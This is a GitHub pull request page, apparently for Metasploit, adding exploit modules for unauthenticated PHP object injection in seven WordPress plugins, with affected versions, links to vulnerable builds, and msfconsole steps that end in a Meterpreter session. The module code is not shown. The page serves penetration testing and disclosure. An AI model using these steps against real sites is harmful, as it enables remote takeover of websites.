Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add exploit modules for multiple PHP object injection vulnerabilities in various WordPress plugins #8006

Closed
wants to merge 28 commits into from

Conversation

@ykoster
Copy link
Contributor

@ykoster ykoster commented Feb 24, 2017

These modules exploit multiple unauthenticated PHP object injection vulnerabilities in various WordPress plugins. Targets WordPress 3.4 - 4.x (tested on WordPress 4.5.3 - 4.7.2).

Affected plugins

Google Forms < 0.91
Ecwid Ecommerce Shopping Cart < 4.4.4
CMS Commander Client < 2.22
InfiniteWP Client < 1.6.1.1
Analytics Stats Counter Statistics (not fixed)
YITH WooCommerce Compare < 2.1.0
Google Analytics Counter Tracker < 3.5.1

Verification

Make sure you're running a WordPress site with one of the affected plugins installed & actived.

Google Forms < 0.91

https://sumofpwn.nl/download/wpgform.0.84.zip

  • Start msfconsole
  • use exploit/multi/http/wp_google_forms_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Ecwid Ecommerce Shopping Cart < 4.4.4

Requires (free) registation & activation @ Ecwid

https://sumofpwn.nl/download/ecwid-shopping-cart.4.4.zip

  • Start msfconsole
  • use exploit/multi/http/wp_ecwid_shopping_cart_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

CMS Commander Client < 2.22

https://sumofpwn.nl/download/cms-commander-client.2.21.zip

  • Start msfconsole
  • use exploit/multi/http/wp_cms_commander_client_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

InfiniteWP Client < 1.6.1.1

https://sumofpwn.nl/download/iwp-client.zip

  • Start msfconsole
  • use exploit/multi/http/wp_infinitewp_client_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Analytics Stats Counter Statistics

https://sumofpwn.nl/download/stats-counter.zip

  • Start msfconsole
  • use exploit/multi/http/wp_analytics_stats_counter_statistics_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

YITH WooCommerce Compare < 2.1.0

Requires WooCommerce

https://sumofpwn.nl/download/yith-woocommerce-compare.2.0.9.zip
https://sumofpwn.nl/download/woocommerce.2.6.1.zip

  • Start msfconsole
  • use exploit/multi/http/wp_yith_woocommerce_compare_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Google Analytics Counter Tracker < 3.5.1

https://sumofpwn.nl/download/analytics-counter.zip

  • Start msfconsole
  • use exploit/multi/http/wp_google_analytics_counter_tracker_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started
Yorick Koster and others added 8 commits Nov 8, 2016
This module exploits multiple PHP object injection vulnerabilities affecting various WordPress plugins. Targets WordPress 3.4 - 4.x (tested on WordPress 4.5.3 - 4.7.2)
Fix formatting warnings
Removed nBill Lite reference, fixed indices
@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Feb 24, 2017

I think this module needs to be broken down into separate modules.

@ykoster
Copy link
Contributor Author

@ykoster ykoster commented Feb 24, 2017

@wchen-r7 split in separate modules :)

ykoster added 3 commits Feb 25, 2017
@ykoster ykoster changed the title Add exploit module for multiple PHP object injection vulnerabilities affecting various WordPress plugins Add exploit modules for multiple PHP object injection vulnerabilities in various WordPress plugins Feb 25, 2017
ykoster added 2 commits Feb 25, 2017
@ykoster
Copy link
Contributor Author

@ykoster ykoster commented Apr 21, 2017

FYI, the POP chain still works in WordPress 4.7.4, which was released yesterday

@jrobles-r7 jrobles-r7 self-assigned this Nov 16, 2018
@acammack-r7 acammack-r7 added the attic label Dec 5, 2018
@acammack-r7
Copy link
Contributor

@acammack-r7 acammack-r7 commented Dec 13, 2018

Hello @ykoster, I'm sorry we have left this sitting for so long. I am closing this PR for now as part of an initiative to have our queue reflect PRs currently being developed, and I have added the attic label so that we won't lose track of it. You can learn more about the new PR label on our wiki. @jrobles-r7 has volunteered to test this and I look forward to when this can be reopened and landed!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

6 participants